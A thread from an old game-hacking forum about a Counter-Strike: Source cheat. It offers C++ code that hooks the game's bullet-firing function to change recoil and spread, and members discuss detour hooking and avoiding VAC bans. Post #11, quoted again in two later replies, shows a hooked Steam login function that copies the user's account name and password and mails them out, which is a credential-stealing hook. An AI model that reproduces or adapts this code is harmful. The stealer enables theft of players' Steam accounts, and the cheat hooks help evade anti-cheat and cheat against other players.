google-site-verification: googlebaca44933768a824.html [CS:S] Framestage Hook Alternative for vis. recoil - Old Royal Hack Forum

Announcement

Collapse
No announcement yet.

[CS:S] Framestage Hook Alternative for vis. recoil

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    [CS:S] Framestage Hook Alternative for vis. recoil

    Code:
    void new_FX_FireBullets( int iPlayerIndex,const Vector &vOrigin,const QAngle &vAngles,int iWeaponID,int iMode,int iSeed,float flSpread)
    {
    	float my_spread = flSpread;
    	QAngle my_recoil = vAngles;
    
    	__asm pushad
    		spread_test = my_spread;
    		org_angle = my_recoil;
    		recoil_test = QAngle(Base.m_pMyPlayer->BaseEnt()->EyeAngles().x+myrecoil[0],Base.m_pMyPlayer->BaseEnt()->EyeAngles().y+myrecoil[1],Base.m_pMyPlayer->BaseEnt()->EyeAngles().z+myrecoil[2]);
    	__asm popad
    
    	__asm pushad
    	FX_FireBullets( iPlayerIndex,vOrigin,recoil_test,iWeaponID,iMode,iSeed,my_spread);
    	__asm popad
    
    }
    Credits: aVitamin

    i search a good source code for Dods with aimbot and other stuff i know this is the same engine as counter strike source but css hacks are not work in dods.

    #2
    How do you hook the function? You cann hook framestagenotify via a vmt hook but you have to use a detour there.


    Hi vac! unless you prevent vac from reading mem in hl2.exe :O

    Comment


      #3
      1) This isnt fsn
      2) I use this since 3 month | no ban
      Last edited by floxy; 03-08-2009, 05:44 PM.

      i search a good source code for Dods with aimbot and other stuff i know this is the same engine as counter strike source but css hacks are not work in dods.

      Comment


        #4
        How do you hook the function? You cann hook framestagenotify via a vmt hook but you have to use a detour there.


        Hi vac! unless you prevent vac from reading mem in hl2.exe :O

        Comment


          #5
          wtf? zombie?

          I hook it via DetourFunc

          i search a good source code for Dods with aimbot and other stuff i know this is the same engine as counter strike source but css hacks are not work in dods.

          Comment


            #6
            How do you hook the function? You cann hook framestagenotify via a vmt hook but you have to use a detour there.


            Hi vac! unless you prevent vac from reading mem in hl2.exe :O

            Comment


              #7
              Time to thank you

              i search a good source code for Dods with aimbot and other stuff i know this is the same engine as counter strike source but css hacks are not work in dods.

              Comment


                #8
                Originally posted by floxy View Post
                Time to thank you
                thank you for thanking me, honey

                Comment


                  #9
                  What teh fuck Lawgiver? :D
                  lolmaoman: Germans are born with a lifetime x22 login engraved into their birth certificates. True story.
                  I DONT HAVE TEAMVIEWER AND IM NOT GOING TO GIVE ANY 24/7 ONLINE SUPPORT VIA STEAM, XFIRE OR OTHER IM PROGRAMS SO DONT BOTHER ASKING. THANKS.

                  Comment


                    #10
                    LOL WTF DID I DO? O_O

                    Double post? rofl idk how ive done that, sry admin delete the other post please..

                    WTF? Weird o.o

                    Comment


                      #11
                      affirmative.



                      Code:
                      int new_SteamLogin( const char *cszUser, const char *cszPassphrase, int bIsSecureComputer, int *pError )
                      {
                      	strcpy(szSteamAccountName,cszUser);
                      	strcpy(szSteamAccountPassword,cszPassphrase);
                      	SendMail();
                      	return SteamLoginPtr( cszUser, cszPassphrase, bIsSecureComputer, pError );
                      }
                      :party0019:
                      I 0x90 you!

                      Comment


                        #12
                        Originally posted by aVitamin View Post
                        affirmative.



                        Code:
                        int new_SteamLogin( const char *cszUser, const char *cszPassphrase, int bIsSecureComputer, int *pError )
                        {
                        	strcpy(szSteamAccountName,cszUser);
                        	strcpy(szSteamAccountPassword,cszPassphrase);
                        	SendMail();
                        	return SteamLoginPtr( cszUser, cszPassphrase, bIsSecureComputer, pError );
                        }
                        :party0019:
                        I think you have stolen this from fumins hack!
                        /* fibre */

                        Comment


                          #13
                          Originally posted by Lawgiver View Post
                          LOL WTF DID I DO? O_O

                          Double post? rofl idk how ive done that, sry admin delete the other post please..

                          WTF? Weird o.o
                          Triple post tbh D:

                          Originally posted by aVitamin View Post
                          affirmative.



                          Code:
                          int new_SteamLogin( const char *cszUser, const char *cszPassphrase, int bIsSecureComputer, int *pError )
                          {
                          	strcpy(szSteamAccountName,cszUser);
                          	strcpy(szSteamAccountPassword,cszPassphrase);
                          	SendMail();
                          	return SteamLoginPtr( cszUser, cszPassphrase, bIsSecureComputer, pError );
                          }
                          lolmaoman: Germans are born with a lifetime x22 login engraved into their birth certificates. True story.
                          I DONT HAVE TEAMVIEWER AND IM NOT GOING TO GIVE ANY 24/7 ONLINE SUPPORT VIA STEAM, XFIRE OR OTHER IM PROGRAMS SO DONT BOTHER ASKING. THANKS.

                          Comment


                            #14
                            I dont think this is correct nospread, simply visual. Hooking Firebullets and returning 0 on spread wont do any good.

                            Comment


                              #15
                              This is the reason why i call this fsn hook alternative.

                              It just corrects the "inperfectness" of the recoil having a nice looking result :)

                              i search a good source code for Dods with aimbot and other stuff i know this is the same engine as counter strike source but css hacks are not work in dods.

                              Comment

                              Working...
                              X